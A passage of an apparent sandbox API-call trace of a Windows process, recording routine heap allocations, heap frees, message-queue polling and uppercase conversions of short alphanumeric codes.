RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0090.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0090.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0090.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0090.748] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0090.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0090.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0090.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0090.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0090.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0090.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0090.748] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0090.748] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0090.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0090.748] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0090.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0090.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0090.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741a8 [0090.749] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0090.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0090.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0090.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0090.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0090.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0090.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0090.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0090.749] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0090.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0090.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0090.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0090.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0090.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0090.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0090.749] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0090.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0090.749] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0090.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0090.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0090.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0090.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0090.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0090.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0090.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0090.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0090.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0090.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0090.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0090.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0090.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0090.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0090.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0090.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0090.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0090.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0090.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0090.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0090.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0090.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0090.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0090.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0090.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0090.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0090.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0090.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b50 [0090.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99d0 [0090.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ed8 [0090.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0090.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0090.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b08 [0090.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9df0 [0090.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0090.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9dd8 [0090.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9dc0 [0090.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0090.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0090.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0090.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0090.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0090.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0090.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0090.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0090.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0090.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0090.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0090.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ed8 | out: hHeap=0x2af0000) returned 1 [0090.752] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741a8 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.752] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0090.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.752] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0090.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c10 [0090.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74628 [0090.753] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0090.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0090.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0090.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0090.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0090.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0090.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0090.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0090.753] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0090.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0090.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0090.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0090.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0090.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0090.753] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0090.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0090.753] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0090.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0090.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0090.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0090.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0090.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0090.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0090.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0090.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0090.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0090.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0090.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74628 | out: hHeap=0x2af0000) returned 1 [0090.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0090.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0090.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0090.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0090.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0090.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0090.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0090.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0090.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0090.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0090.754] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0090.754] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0090.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0090.754] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0090.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0090.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0090.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0090.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0090.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0090.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0090.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0090.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0090.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0090.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0090.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0090.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0090.755] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0090.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0090.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0090.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0090.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0090.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0090.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0090.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0090.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0090.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0090.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | 